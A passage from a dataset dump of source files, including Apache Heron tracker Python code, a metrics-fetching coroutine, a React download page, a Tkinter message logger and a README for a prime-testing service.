topology given its cluster, environ, topology name, and\n an optional role.\n Raises exception if topology is not found, or more than one are found.\n \"\"\"\n topologies = [t for t in self.topologies if t.name == topology_name\n and t.cluster == cluster\n and (not role or t.execution_state.role == role)\n and t.environ == environ]\n if len(topologies) != 1:\n if role is not None:\n raise Exception(\"Topology not found for {0}, {1}, {2}, {3}\".format(\n cluster, role, environ, topology_name))\n raise Exception(\"Topology not found for {0}, {1}, {2}\".format(\n cluster, environ, topology_name))\n\n # There is only one topology which is returned.\n return topologies[0]\n\n def get_stmgr_topologies(self, name: str) -> List[Any]:\n \"\"\"\n Returns all the topologies for a given state manager.\n \"\"\"\n return [t for t in self.topologies if t.state_manager_name == name]\n\n def add_new_topology(self, state_manager, topology_name: str) -> None:\n \"\"\"\n Adds a topology in the local cache, and sets a watch\n on any changes on the topology.\n \"\"\"\n topology = Topology(topology_name, state_manager.name)\n Log.info(\"Adding new topology: %s, state_manager: %s\",\n topology_name, state_manager.name)\n self.topologies.append(topology)\n\n # Register a watch on topology and change\n # the topology_info on any new change.\n topology.register_watch(self.set_topology_info)\n\n # Set watches on the pplan, 
execution_state, tmanager and scheduler_location.\n state_manager.get_pplan(topology_name, topology.set_physical_plan)\n state_manager.get_packing_plan(topology_name, topology.set_packing_plan)\n state_manager.get_execution_state(topology_name, topology.set_execution_state)\n state_manager.get_tmanager(topology_name, topology.set_tmanager)\n state_manager.get_scheduler_location(topology_name, topology.set_scheduler_location)\n\n def remove_topology(self, topology_name: str, state_manager_name: str) -> None:\n \"\"\"\n Removes the topology from the local cache.\n \"\"\"\n topologies = []\n for top in self.topologies:\n if (top.name == topology_name and\n top.state_manager_name == state_manager_name):\n # Remove topology_info\n if (topology_name, state_manager_name) in self.topology_infos:\n self.topology_infos.pop((topology_name, state_manager_name))\n else:\n topologies.append(top)\n\n self.topologies = topologies\n\n def extract_execution_state(self, topology) -> dict:\n \"\"\"\n Returns the repesentation of execution state that will\n be returned from Tracker.\n\n It looks like this has been replaced with extract_metadata and\n extract_runtime_state.\n\n \"\"\"\n result = self.extract_metadata(topology)\n result.update({\n \"has_physical_plan\": None,\n \"has_tmanager_location\": None,\n \"has_scheduler_location\": None,\n })\n return result\n\n def extract_metadata(self, topology) -> dict:\n \"\"\"\n Returns metadata that will be returned from Tracker.\n \"\"\"\n execution_state = topology.execution_state\n metadata = {\n \"cluster\": execution_state.cluster,\n \"environ\": execution_state.environ,\n \"role\": execution_state.role,\n \"jobname\": topology.name,\n \"submission_time\": execution_state.submission_time,\n \"submission_user\": execution_state.submission_user,\n \"release_username\": execution_state.release_state.release_username,\n \"release_tag\": execution_state.release_state.release_tag,\n \"release_version\": execution_state.release_state.release_version,\n \"extra_links\": [],\n }\n\n for extra_link in self.config.extra_links:\n link = extra_link.copy()\n link[EXTRA_LINK_URL_KEY] = self.config.get_formatted_url(link[EXTRA_LINK_FORMATTER_KEY],\n metadata)\n metadata[\"extra_links\"].append(link)\n return metadata\n\n @staticmethod\n def extract_runtime_state(topology):\n # \"stmgrs\" listed runtime state for each stream manager\n # however it is possible that physical plan is not complete\n # yet and we do not know how many stmgrs there are. 
That said,\n # we should not set any key below (stream manager name)\n return {\n \"has_physical_plan\": bool(topology.physical_plan),\n \"has_packing_plan\": bool(topology.packing_plan),\n \"has_tmanager_location\": bool(topology.tmanager),\n \"has_scheduler_location\": bool(topology.scheduler_location),\n \"stmgrs\": {},\n }\n\n # pylint: disable=no-self-use\n def extract_scheduler_location(self, topology) -> dict:\n \"\"\"\n Returns the representation of scheduler location that will\n be returned from Tracker.\n \"\"\"\n schedulerLocation = {\n \"name\": None,\n \"http_endpoint\": None,\n \"job_page_link\": None,\n }\n\n if topology.scheduler_location:\n schedulerLocation[\"name\"] = topology.scheduler_location.topology_name\n schedulerLocation[\"http_endpoint\"] = topology.scheduler_location.http_endpoint\n schedulerLocation[\"job_page_link\"] = \\\n topology.scheduler_location.job_page_link[0] \\\n if topology.scheduler_location.job_page_link else \"\"\n\n return schedulerLocation\n\n def extract_tmanager(self, topology) -> dict:\n \"\"\"\n Returns the representation of tmanager that will\n be returned from Tracker.\n \"\"\"\n tmanagerLocation = {\n \"name\": None,\n \"id\": None,\n \"host\": None,\n \"controller_port\": None,\n \"server_port\": None,\n \"stats_port\": None,\n }\n if topology.tmanager:\n tmanagerLocation[\"name\"] = topology.tmanager.topology_name\n tmanagerLocation[\"id\"] = topology.tmanager.topology_id\n tmanagerLocation[\"host\"] = topology.tmanager.host\n tmanagerLocation[\"controller_port\"] = topology.tmanager.controller_port\n tmanagerLocation[\"server_port\"] = topology.tmanager.server_port\n tmanagerLocation[\"stats_port\"] = topology.tmanager.stats_port\n\n return tmanagerLocation\n\n # pylint: disable=too-many-locals\n def extract_logical_plan(self, topology):\n \"\"\"\n Returns the representation of logical plan that will\n be returned from Tracker.\n \"\"\"\n logicalPlan = {\n \"spouts\": {},\n \"bolts\": {},\n }\n\n # Add spouts.\n for spout in topology.spouts():\n spoutType = \"default\"\n spoutSource = \"NA\"\n spoutVersion = \"NA\"\n spoutConfigs = spout.comp.config.kvs\n spoutExtraLinks = []\n for kvs in spoutConfigs:\n if kvs.key == \"spout.type\":\n spoutType = javaobj.loads(kvs.serialized_value)\n elif kvs.key == \"spout.source\":\n spoutSource = javaobj.loads(kvs.serialized_value)\n elif kvs.key == \"spout.version\":\n spoutVersion = javaobj.loads(kvs.serialized_value)\n elif kvs.key == \"extra.links\":\n spoutExtraLinks = json.loads(javaobj.loads(kvs.serialized_value))\n\n spoutPlan = {\n \"config\": convert_pb_kvs(spoutConfigs, include_non_primitives=False),\n \"type\": spoutType,\n \"source\": spoutSource,\n \"version\": spoutVersion,\n \"outputs\": [\n {\"stream_name\": outputStream.stream.id}\n for outputStream in spout.outputs\n ],\n \"extra_links\": spoutExtraLinks,\n }\n logicalPlan[\"spouts\"][spout.comp.name] = spoutPlan\n\n # render component extra links with general params\n execution_state = {\n \"cluster\": topology.execution_state.cluster,\n \"environ\": topology.execution_state.environ,\n \"role\": topology.execution_state.role,\n \"jobname\": topology.name,\n \"submission_user\": topology.execution_state.submission_user,\n }\n\n for link in spoutPlan[\"extra_links\"]:\n link[EXTRA_LINK_URL_KEY] = self.config.get_formatted_url(link[EXTRA_LINK_FORMATTER_KEY],\n execution_state)\n\n # Add bolts.\n for bolt in topology.bolts():\n boltName = bolt.comp.name\n logicalPlan[\"bolts\"][boltName] = {\n \"config\": 
convert_pb_kvs(bolt.comp.config.kvs, include_non_primitives=False),\n \"outputs\": [\n {\"stream_name\": outputStream.stream.id}\n for outputStream in bolt.outputs\n ],\n \"inputs\": [\n {\n \"stream_name\": inputStream.stream.id,\n \"component_name\": inputStream.stream.component_name,\n \"grouping\": topology_pb2.Grouping.Name(inputStream.gtype),\n }\n for inputStream in bolt.inputs\n ]\n }\n\n\n return logicalPlan\n\n # pylint: disable=too-many-locals\n def extract_physical_plan(self, topology):\n \"\"\"\n Returns the representation of physical plan that will\n be returned from Tracker.\n \"\"\"\n physicalPlan = {\n \"instances\": {},\n \"instance_groups\": {},\n \"stmgrs\": {},\n \"spouts\": {},\n \"bolts\": {},\n \"config\": {},\n \"components\": {}\n }\n\n if not topology.physical_plan:\n return physicalPlan\n\n spouts = topology.spouts()\n bolts = topology.bolts()\n stmgrs = None\n instances = None\n\n # Physical Plan\n stmgrs = list(topology.physical_plan.stmgrs)\n instances = list(topology.physical_plan.instances)\n\n # Configs\n if topology.physical_plan.topology.topology_config:\n physicalPlan[\"config\"] = convert_pb_kvs(topology.physical_plan.topology.topology_config.kvs)\n\n for spout in spouts:\n spout_name = spout.comp.name\n physicalPlan[\"spouts\"][spout_name] = []\n if spout_name not in physicalPlan[\"components\"]:\n physicalPlan[\"components\"][spout_name] = {\n \"config\": convert_pb_kvs(spout.comp.config.kvs)\n }\n for bolt in bolts:\n bolt_name = bolt.comp.name\n physicalPlan[\"bolts\"][bolt_name] = []\n if bolt_name not in physicalPlan[\"components\"]:\n physicalPlan[\"components\"][bolt_name] = {\n \"config\": convert_pb_kvs(bolt.comp.config.kvs)\n }\n\n for stmgr in stmgrs:\n host = stmgr.host_name\n cwd = stmgr.cwd\n shell_port = stmgr.shell_port if stmgr.HasField(\"shell_port\") else None\n physicalPlan[\"stmgrs\"][stmgr.id] = {\n \"id\": stmgr.id,\n \"host\": host,\n \"port\": stmgr.data_port,\n \"shell_port\": shell_port,\n \"cwd\": cwd,\n \"pid\": stmgr.pid,\n \"joburl\": utils.make_shell_job_url(host, shell_port, cwd),\n \"logfiles\": utils.make_shell_logfiles_url(host, shell_port, cwd),\n \"instance_ids\": []\n }\n\n instance_groups = collections.OrderedDict()\n for instance in instances:\n instance_id = instance.instance_id\n stmgrId = instance.stmgr_id\n name = instance.info.component_name\n stmgrInfo = physicalPlan[\"stmgrs\"][stmgrId]\n host = stmgrInfo[\"host\"]\n cwd = stmgrInfo[\"cwd\"]\n shell_port = stmgrInfo[\"shell_port\"]\n\n\n # instance_id format container_<index>_component_1\n # group name is container_<index>\n group_name = instance_id.rsplit(\"_\", 2)[0]\n igroup = instance_groups.get(group_name, list())\n igroup.append(instance_id)\n instance_groups[group_name] = igroup\n\n physicalPlan[\"instances\"][instance_id] = {\n \"id\": instance_id,\n \"name\": name,\n \"stmgrId\": stmgrId,\n \"logfile\": utils.make_shell_logfiles_url(host, shell_port, cwd, instance.instance_id),\n }\n physicalPlan[\"stmgrs\"][stmgrId][\"instance_ids\"].append(instance_id)\n if name in physicalPlan[\"spouts\"]:\n physicalPlan[\"spouts\"][name].append(instance_id)\n else:\n physicalPlan[\"bolts\"][name].append(instance_id)\n\n physicalPlan[\"instance_groups\"] = instance_groups\n\n return physicalPlan\n\n # pylint: disable=too-many-locals\n def extract_packing_plan(self, topology):\n \"\"\"\n Returns the representation of packing plan that will be returned from Tracker.\n\n \"\"\"\n packingPlan = {\n \"id\": \"\",\n \"container_plans\": []\n }\n\n if not 
topology.packing_plan:\n return packingPlan\n\n packingPlan[\"id\"] = topology.packing_plan.id\n packingPlan[\"container_plans\"] = [\n {\n \"id\": container_plan.id,\n \"instances\": [\n {\n \"component_name\" : instance_plan.component_name,\n \"task_id\" : instance_plan.task_id,\n \"component_index\": instance_plan.component_index,\n \"instance_resources\": {\n \"cpu\": instance_plan.resource.cpu,\n \"ram\": instance_plan.resource.ram,\n \"disk\": instance_plan.resource.disk,\n },\n }\n for instance_plan in container_plan.instance_plans\n ],\n \"required_resources\": {\n \"cpu\": container_plan.requiredResource.cpu,\n \"ram\": container_plan.requiredResource.ram,\n \"disk\": container_plan.requiredResource.disk,\n },\n \"scheduled_resources\": (\n {}\n if not container_plan else\n {\n \"cpu\": container_plan.scheduledResource.cpu,\n \"ram\": container_plan.scheduledResource.ram,\n \"disk\": container_plan.scheduledResource.disk,\n }\n ),\n }\n for container_plan in topology.packing_plan.container_plans\n ]\n\n return packingPlan\n\n def set_topology_info(self, topology) -> Optional[dict]:\n \"\"\"\n Extracts info from the stored proto states and\n convert it into representation that is exposed using\n the API.\n This method is called on any change for the topology.\n For example, when a container moves and its host or some\n port changes. All the information is parsed all over\n again and cache is updated.\n \"\"\"\n # Execution state is the most basic info.\n # If there is no execution state, just return\n # as the rest of the things don't matter.\n if not topology.execution_state:\n Log.info(\"No execution state found for: \" + topology.name)\n return\n\n Log.info(\"Setting topology info for topology: \" + topology.name)\n has_physical_plan = True\n if not topology.physical_plan:\n has_physical_plan = False\n\n Log.info(\"Setting topology info for topology: \" + topology.name)\n has_packing_plan = True\n if not topology.packing_plan:\n has_packing_plan = False\n\n has_tmanager_location = True\n if not topology.tmanager:\n has_tmanager_location = False\n\n has_scheduler_location = True\n if not topology.scheduler_location:\n has_scheduler_location = False\n\n topology_info = {\n \"name\": topology.name,\n \"id\": topology.id,\n \"logical_plan\": None,\n \"physical_plan\": None,\n \"packing_plan\": None,\n \"execution_state\": None,\n \"tmanager_location\": None,\n \"scheduler_location\": None,\n }\n\n execution_state = self.extract_execution_state(topology)\n execution_state[\"has_physical_plan\"] = has_physical_plan\n execution_state[\"has_packing_plan\"] = has_packing_plan\n execution_state[\"has_tmanager_location\"] = has_tmanager_location\n execution_state[\"has_scheduler_location\"] = has_scheduler_location\n execution_state[\"status\"] = topology.get_status()\n\n topology_info[\"metadata\"] = self.extract_metadata(topology)\n topology_info[\"runtime_state\"] = self.extract_runtime_state(topology)\n\n topology_info[\"execution_state\"] = execution_state\n topology_info[\"logical_plan\"] = self.extract_logical_plan(topology)\n topology_info[\"physical_plan\"] = self.extract_physical_plan(topology)\n topology_info[\"packing_plan\"] = self.extract_packing_plan(topology)\n topology_info[\"tmanager_location\"] = self.extract_tmanager(topology)\n topology_info[\"scheduler_location\"] = self.extract_scheduler_location(topology)\n\n self.topology_infos[(topology.name, topology.state_manager_name)] = topology_info\n\n # topology_name should be at the end to follow the trend\n def 
get_topology_info(\n self,\n topology_name: str,\n cluster: str,\n role: Optional[str],\n environ: str,\n ) -> str:\n \"\"\"\n Returns the JSON representation of a topology\n by its name, cluster, environ, and an optional role parameter.\n Raises exception if no such topology is found.\n\n \"\"\"\n # Iterate over the values to filter the desired topology.\n for (tn, _), topology_info in self.topology_infos.items():\n execution_state = topology_info[\"execution_state\"]\n if (tn == topology_name and\n cluster == execution_state[\"cluster\"] and\n environ == execution_state[\"environ\"] and\n (not role or execution_state.get(\"role\") == role)\n ):\n return topology_info\n\n Log.info(\n f\"Count not find topology info for cluster={cluster!r},\"\n f\" role={role!r}, environ={environ!r}, role={role!r},\"\n f\" topology={topology_name!r}\"\n )\n raise Exception(\"No topology found\")\n"
},
{
"alpha_fraction": 0.6754460334777832,
"alphanum_fraction": 0.6801189184188843,
"avg_line_length": 31.923076629638672,
"blob_id": "63d491e2c89dd5fe9eb1673497df22e83df5f3f1",
"content_id": "40e30c95edaa63c9e7ddc1294a3d5ce71e572f0f",
"detected_licenses": [
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4708,
"license_type": "permissive",
"max_line_length": 99,
"num_lines": 143,
"path": "/heron/tools/tracker/src/python/metricstimeline.py",
"repo_name": "joshfischer1108/incubator-heron",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n# -*- encoding: utf-8 -*-\n\n# Licensed to the Apache Software Foundation (ASF) under one\n# or more contributor license agreements. See the NOTICE file\n# distributed with this work for additional information\n# regarding copyright ownership. The ASF licenses this file\n# to you under the Apache License, Version 2.0 (the\n# \"License\"); you may not use this file except in compliance\n# with the License. You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing,\n# software distributed under the License is distributed on an\n# \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n# KIND, either express or implied. See the License for the\n# specific language governing permissions and limitations\n# under the License.\n\n\"\"\" metricstimeline.py \"\"\"\nfrom typing import List\n\nimport tornado.gen\n\nfrom heron.common.src.python.utils.log import Log\nfrom heron.proto import common_pb2\nfrom heron.proto import tmanager_pb2\n\n# pylint: disable=too-many-locals, too-many-branches, unused-argument\[email protected]\ndef get_metrics_timeline(\n tmanager: tmanager_pb2.TManagerLocation,\n component_name: str,\n metric_names: List[str],\n instances: List[str],\n start_time: int,\n end_time: int,\n callback=None,\n) -> dict:\n \"\"\"\n Get the specified metrics for the given component name of this topology.\n Returns the following dict on success:\n {\n \"timeline\": {\n <metricname>: {\n <instance>: {\n <start_time> : <numeric value>,\n <start_time> : <numeric value>,\n ...\n }\n ...\n }, ...\n },\n \"starttime\": <numeric value>,\n \"endtime\": <numeric value>,\n \"component\": \"...\"\n }\n\n Returns the following dict on failure:\n {\n \"message\": \"...\"\n }\n \"\"\"\n # Tmanager is the proto object and must have host and port for stats.\n if not tmanager or not tmanager.host or not tmanager.stats_port:\n raise Exception(\"No Tmanager found\")\n\n host = tmanager.host\n port = tmanager.stats_port\n\n # Create the proto request object to get metrics.\n\n request_parameters = tmanager_pb2.MetricRequest()\n request_parameters.component_name = component_name\n\n # If no instances are given, metrics for all instances\n # are fetched by default.\n request_parameters.instance_id.extend(instances)\n request_parameters.metric.extend(metric_names)\n\n request_parameters.explicit_interval.start = start_time\n request_parameters.explicit_interval.end = end_time\n request_parameters.minutely = True\n\n # Form and send the http request.\n url = f\"http://{host}:{port}/stats\"\n request = tornado.httpclient.HTTPRequest(url,\n body=request_parameters.SerializeToString(),\n method='POST',\n request_timeout=5)\n\n Log.debug(\"Making HTTP call to fetch metrics\")\n Log.debug(\"url: \" + url)\n try:\n client = tornado.httpclient.AsyncHTTPClient()\n result = yield client.fetch(request)\n Log.debug(\"HTTP call complete.\")\n except tornado.httpclient.HTTPError as e:\n raise Exception(str(e))\n\n\n # Check the response code - error if it is in 400s or 500s\n if result.code >= 400:\n message = f\"Error in getting metrics from Tmanager, code: {result.code}\"\n raise Exception(message)\n\n # Parse the response from tmanager.\n response_data = tmanager_pb2.MetricResponse()\n response_data.ParseFromString(result.body)\n\n if response_data.status.status == common_pb2.NOTOK:\n if response_data.status.HasField(\"message\"):\n Log.warn(\"Received response from Tmanager: %s\", 
response_data.status.message)\n\n # Form the response.\n ret = {}\n ret[\"starttime\"] = start_time\n ret[\"endtime\"] = end_time\n ret[\"component\"] = component_name\n ret[\"timeline\"] = {}\n\n # Loop through all the metrics\n # One instance corresponds to one metric, which can have\n # multiple IndividualMetrics for each metricname requested.\n for metric in response_data.metric:\n instance = metric.instance_id\n\n # Loop through all individual metrics.\n for im in metric.metric:\n metricname = im.name\n if metricname not in ret[\"timeline\"]:\n ret[\"timeline\"][metricname] = {}\n if instance not in ret[\"timeline\"][metricname]:\n ret[\"timeline\"][metricname][instance] = {}\n\n # We get minutely metrics.\n # Interval-values correspond to the minutely mark for which\n # this metric value corresponds to.\n for interval_value in im.interval_values:\n ret[\"timeline\"][metricname][instance][interval_value.interval.start] = interval_value.value\n\n raise tornado.gen.Return(ret)\n"
},
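The coroutine above only reads `host` and `stats_port` off the `TManagerLocation` proto, so a plain script can drive it to completion with `run_sync`. A minimal sketch, assuming the module is importable as `metricstimeline`; every concrete host, port, metric, and time value below is an assumption, not something taken from the file:

```python
# Hypothetical driver for get_metrics_timeline; all concrete values are assumptions.
import tornado.ioloop
from heron.proto import tmanager_pb2
from metricstimeline import get_metrics_timeline  # assumed import path

tmanager = tmanager_pb2.TManagerLocation()
tmanager.host = "127.0.0.1"   # assumed TManager stats host
tmanager.stats_port = 8888    # assumed stats port

# run_sync drives the @tornado.gen.coroutine to completion and returns its gen.Return value
result = tornado.ioloop.IOLoop.current().run_sync(
    lambda: get_metrics_timeline(tmanager, "word-spout", ["__emit-count/default"],
                                 [], 1600000000, 1600000300))
print(result["timeline"])
```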
{
"alpha_fraction": 0.5160354971885681,
"alphanum_fraction": 0.5223473310470581,
"avg_line_length": 36.34394836425781,
"blob_id": "7517dc2ac33ef0043d3d0ad7acf728122aa92dc0",
"content_id": "df631b5841afa8ce6ec0950e484e14685f719854",
"detected_licenses": [
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 5862,
"license_type": "permissive",
"max_line_length": 149,
"num_lines": 157,
"path": "/website2/website/pages/en/download.js",
"repo_name": "joshfischer1108/incubator-heron",
"src_encoding": "UTF-8",
"text": "const React = require('react');\n\nconst CompLibrary = require('../../core/CompLibrary');\nconst MarkdownBlock = CompLibrary.MarkdownBlock; /* Used to read markdown */\nconst Container = CompLibrary.Container;\nconst GridBlock = CompLibrary.GridBlock;\n\nconst CWD = process.cwd();\n\nconst siteConfig = require(`${CWD}/siteConfig.js`);\nconst releases = require(`${CWD}/releases.json`);\nconst heronReleases = require(`${CWD}/heron-release.json`)\n\nfunction getLatestArchiveMirrorUrl(version, type) {\n return `https://www.apache.org/dyn/mirrors/mirrors.cgi?action=download&filename=incubator/heron/heron-${version}/heron-${version}-${type}.tar.gz`\n}\n\nfunction distUrl(version, type) {\n return `https://www.apache.org/dist/incubator/heron/heron-${version}/heron-${version}-${type}.tar.gz`\n}\n\nfunction archiveUrl(version, type) {\n if (version.includes('incubating')) {\n return `https://archive.apache.org/dist/incubator/heron/heron-${version}/apache-heron-v-${version}-${type}.tar.gz`\n } else {\n return `https://archive.apache.org/dist/heron/heron-${version}/apache-heron-v-${version}-${type}.tar.gz`\n }\n}\n\n\n\nclass Download extends React.Component {\n render() {\n const latestVersion = releases[0];\n const latestHeronVersion = heronReleases[0];\n const latestArchiveMirrorUrl = getLatestArchiveMirrorUrl(latestVersion, 'bin');\n const latestSrcArchiveMirrorUrl = getLatestArchiveMirrorUrl(latestVersion, 'src');\n const latestArchiveUrl = distUrl(latestVersion, 'bin');\n const latestSrcArchiveUrl = distUrl(latestVersion, 'src')\n\n const releaseInfo = releases.map(version => {\n return {\n version: version,\n binArchiveUrl: archiveUrl(version, 'bin'),\n srcArchiveUrl: archiveUrl(version, 'source')\n }\n });\n\n\n return (\n <div className=\"pageContainer\">\n <Container className=\"mainContainer documentContainer postContainer\">\n <div className=\"post\">\n <header className=\"postHeader\">\n <h1>Apache Heron (Incubating) downloads</h1>\n <hr />\n </header>\n\n <h2>Release notes</h2>\n <div>\n <p>\n <a href={`${siteConfig.baseUrl}${this.props.language}/release-notes`}>Release notes</a> for all Heron's versions\n </p>\n </div>\n\n <h2 id=\"latest\">Current version (Stable) {latestHeronVersion}</h2>\n <table className=\"versions\" style={{width:'100%'}}>\n <thead>\n <tr>\n <th>Release</th>\n <th>Link</th>\n <th>Crypto files</th>\n </tr>\n </thead>\n <tbody>\n\n\n <tr key={'source'}>\n <th>Source</th>\n <td>\n <a href={latestSrcArchiveMirrorUrl}>apache-heron-{latestVersion}-src.tar.gz</a>\n </td>\n <td>\n <a href={`${latestSrcArchiveUrl}.asc`}>asc</a>, \n <a href={`${latestSrcArchiveUrl}.sha512`}>sha512</a>\n </td>\n </tr>\n </tbody>\n </table>\n\n\n <h2>Release Integrity</h2>\n <MarkdownBlock>\n You must [verify](https://www.apache.org/info/verification.html) the integrity of the downloaded files.\n We provide OpenPGP signatures for every release file. This signature should be matched against the\n [KEYS](https://downloads.apache.org/incubator/heron/KEYS) file which contains the OpenPGP keys of\n Herons's Release Managers. 
We also provide `SHA-512` checksums for every release file.\n After you download the file, you should calculate a checksum for your download, and make sure it is\n the same as ours.\n </MarkdownBlock>\n\n <h2>Getting started</h2>\n <div>\n <p>\n\n Once you've downloaded a Heron release, instructions on getting up and running with a standalone cluster\n that you can run on your laptop can be found in the{' '}\n \n <a href={`${siteConfig.baseUrl}docs/getting-started-local-single-node`}>run Heron locally</a> tutorial.\n </p>\n </div>\n\n\n <h2 id=\"archive\">Older releases</h2>\n <table className=\"versions\">\n <thead>\n <tr>\n <th>Release</th>\n\n <th>Source</th>\n <th>Release notes</th>\n </tr>\n </thead>\n <tbody>\n {releaseInfo.map(\n info => {\n var sha = \"sha512\"\n if (info.version.includes('1.19.0-incubating') || info.version.includes('1.20.0-incubating')) {\n sha = \"sha\"\n }\n return info.version !== latestVersion && (\n <tr key={info.version}>\n <th>{info.version}</th>\n\n <td>\n <a href={info.srcArchiveUrl}>apache-heron-{info.version}-source.tar.gz</a>\n \n (<a href={`${info.srcArchiveUrl}.asc`}>asc</a>, \n <a href={`${info.srcArchiveUrl}.${sha}`}>{`${sha}`}</a>)\n </td>\n <td>\n <a href={`${siteConfig.baseUrl}${this.props.language}/release-notes#${info.version}`}>Release Notes</a>\n </td>\n </tr>\n )\n }\n )}\n </tbody>\n </table>\n </div>\n </Container>\n </div>\n );\n }\n}\n\nmodule.exports = Download;"
}
] | 4 |
dmitry040698/Simple_logger | https://github.com/dmitry040698/Simple_logger | 628eb861ab6a08109f3150d46332809767222d92 | 6df396318ab854ab38409b1914507d1033957eb3 | e3d094607fb4a8915c64e805716e884922f4fa88 | refs/heads/main | 2023-04-01T13:12:29.238687 | 2021-03-29T14:41:28 | 2021-03-29T14:41:28 | 352676620 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5515776872634888,
"alphanum_fraction": 0.573725700378418,
"avg_line_length": 31.632652282714844,
"blob_id": "f7e16ef435985b3c19c42ae778442558c1c88a69",
"content_id": "8509ff4f8523a6654f6017abae16171ec2a6c874",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3332,
"license_type": "no_license",
"max_line_length": 102,
"num_lines": 98,
"path": "/main.py",
"repo_name": "dmitry040698/Simple_logger",
"src_encoding": "UTF-8",
"text": "import tkinter as tk\r\nfrom datetime import datetime\r\nfrom tkinter import scrolledtext\r\n\r\n\r\ndef window_tk():\r\n date_now = datetime.now().date()\r\n time_now = datetime.now().time()\r\n prior_error = \"ERROR\"\r\n prior_debug = \"DEBUG\"\r\n prior_trace = \"TRACE\"\r\n str_error = \"Error occured\"\r\n str_debug = \"DEBUG mode\"\r\n str_trace = \"Tracing\"\r\n\r\n window = tk.Tk()\r\n window.title(\"Lab 2\")\r\n window.geometry('430x400')\r\n\r\n label_name = tk.Label(text=\"Имя файла:\")\r\n label_name.grid(column=0, row=0, sticky=\"w\", padx=5, pady=5)\r\n\r\n file_name = tk.StringVar()\r\n entry_name = tk.Entry(textvariable=file_name)\r\n entry_name.grid(column=1, row=0, padx=5, pady=5)\r\n\r\n label_format = tk.Label(text=\"Формат сообщения:\")\r\n label_format.grid(column=0, row=1, sticky=\"w\", padx=5, pady=5)\r\n\r\n label_format_example = tk.Label(text=\"Пример формата: {prior} {data} {time} {message}\")\r\n label_format_example.grid(column=0, row=2, columnspan=3, sticky=\"w\", padx=5, pady=5)\r\n\r\n file_format = tk.StringVar()\r\n entry_format = tk.Entry(textvariable=file_format)\r\n entry_format.grid(column=1, row=1, padx=5, pady=5)\r\n\r\n def click_button_error(file_format2=\"\", name=\"\"):\r\n file_format2 = file_format2 + file_format.get()\r\n name = name + file_name.get()\r\n form = file_format2.format(message=str_error, data=date_now, time=time_now, prior=prior_error)\r\n result.insert(1.0, form + '\\n')\r\n print(form + '\\n')\r\n f = open('C:/Users/Dima/Downloads/' + name + '.csv', 'a')\r\n f.write(form + '\\n')\r\n f.close()\r\n\r\n def click_button_debug(file_format2=\"\", name=\"\"):\r\n file_format2 = file_format2 + file_format.get()\r\n name = name + file_name.get()\r\n form = file_format2.format(message=str_debug, data=date_now, time=time_now, prior=prior_debug)\r\n result.insert(1.0, form + '\\n')\r\n print(form + '\\n')\r\n f = open('C:/Users/Dima/Downloads/' + name + '.csv', 'a')\r\n f.write(form + '\\n')\r\n f.close()\r\n\r\n def click_button_trace(file_format2=\"\", name=\"\"):\r\n file_format2 = file_format2 + file_format.get()\r\n name = name + file_name.get()\r\n form = file_format2.format(message=str_trace, data=date_now, time=time_now, prior=prior_trace)\r\n result.insert(1.0, form + '\\n')\r\n print(form + '\\n')\r\n f = open('C:/Users/Dima/Downloads/' + name + '.csv', 'a')\r\n f.write(form + '\\n')\r\n f.close()\r\n\r\n button_error = tk.Button(\r\n text=\"Error\",\r\n width=6,\r\n height=2,\r\n command=click_button_error\r\n )\r\n button_error.grid(column=0, row=3, sticky=\"w\", padx=5, pady=5)\r\n\r\n button_debug = tk.Button(\r\n text=\"Debug\",\r\n width=6,\r\n height=2,\r\n command=click_button_debug\r\n )\r\n button_debug.grid(column=1, row=3, sticky=\"w\", padx=5, pady=5)\r\n\r\n button_trace = tk.Button(\r\n text=\"Trace\",\r\n width=6,\r\n height=2,\r\n command=click_button_trace\r\n )\r\n button_trace.grid(column=2, row=3, sticky=\"w\", padx=5, pady=5)\r\n\r\n result = scrolledtext.ScrolledText(window, width=50, height=15)\r\n result.grid(column=0, row=4, columnspan=3, padx=5, pady=5)\r\n\r\n window.mainloop()\r\n\r\n\r\nif __name__ == '__main__':\r\n window_tk()\r\n"
}
] | 1 |
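main.py builds every log line by pushing fixed field names through the user-supplied template with `str.format`. A standalone sketch of that mechanism, using the example template from the UI label (the field values are illustrative; `"Error occured"` is the literal message string from main.py):

```python
from datetime import datetime

# the placeholder names main.py supports: {prior} {data} {time} {message}
template = "{prior} {data} {time} {message}"
line = template.format(prior="ERROR", data=datetime.now().date(),
                       time=datetime.now().time(), message="Error occured")
print(line)  # e.g. "ERROR 2021-03-29 14:41:28.123456 Error occured"
```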
blueitem/PrimeTestService | https://github.com/blueitem/PrimeTestService | 329a136b3213cde7e728861a552338344fe1f783 | 88f8c4cb9cfecd0c4012d7f7ea3305fe968f0151 | f3a7ebcb75168bc201a2ac26fc2c424ea780c911 | refs/heads/master | 2021-01-19T07:06:50.689290 | 2014-11-18T02:57:13 | 2014-11-18T02:57:13 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.7652173638343811,
"alphanum_fraction": 0.7652173638343811,
"avg_line_length": 42.125,
"blob_id": "5d3a16dc8664f3223e3c8d90a09c4b383f2a9106",
"content_id": "914616d64b9b33dea3636105ef9137be6f7f17c1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 345,
"license_type": "no_license",
"max_line_length": 111,
"num_lines": 8,
"path": "/README.md",
"repo_name": "blueitem/PrimeTestService",
"src_encoding": "UTF-8",
"text": "PrimeTestService\n================\n\nRuns a server that provides a Prime Testing Service for a client.\nThe client can call the Prime Testing Service from the server to:\n- Check whether a number inputed by the client is a prime number\n\nUsage: PrimeService.py must be running on the server machine, and PrimeClient must be run on the Client machine\n"
},
{
"alpha_fraction": 0.596203625202179,
"alphanum_fraction": 0.6220880150794983,
"avg_line_length": 21.745098114013672,
"blob_id": "1c9ddc3dc10ccb5ed83ddebff92c004198362dcb",
